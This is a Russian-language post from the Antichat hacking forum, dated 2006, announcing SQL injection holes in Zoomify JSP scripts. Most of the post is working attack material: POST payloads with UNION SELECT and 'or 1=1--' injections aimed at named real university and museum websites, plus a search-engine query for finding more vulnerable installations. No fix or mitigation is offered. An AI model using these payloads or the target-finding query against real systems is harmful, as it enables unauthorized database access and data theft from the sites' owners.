HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Многочисленные уязвимости Zoomify
  #1  
Старый 16.11.2006, 02:56
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
С нами: 10762826

Репутация: 1348


По умолчанию Многочисленные уязвимости Zoomify

Zoomify представляет собой достаточно распространенный набор JavaScript - скриптов.
Уязвимы несколько переменных (отсутсвие филтрации), например:
$VolumeId, $pageId скрипта eachpage.jsp
Пример:
_http://tomcat.sunsite.ualberta.ca/Imanishi/eachpage.jsp
POST: pageid=KAMA0008&VolumeId=KAMA'+union%20select%201, 2--&catNumber=13


$imagecode в скрипте image-detail.jsp
Пример:
_http://www.nhm.ac.uk/research-curation/projects/solanaceaesource/taxonomy/image-detail.jsp
POST:imagecode=931+or+1=1--


Google trick:
powered Zoomify [filetype:jsp]
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Многочисленные уязвимости e107 v0.7.1 RE vectorg Уязвимости 2 08.08.2007 08:16
Какие уязвимости есть в IPB v1.1.2? Inferno Уязвимости CMS / форумов 2 26.06.2007 22:23
Многочисленные уязвимости Danneo CMS vectorg Уязвимости 2 23.04.2006 16:38
Действующие уязвимости почтовых систем РФ Maxmen Уязвимости Mail-сервис 16 12.12.2004 16:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...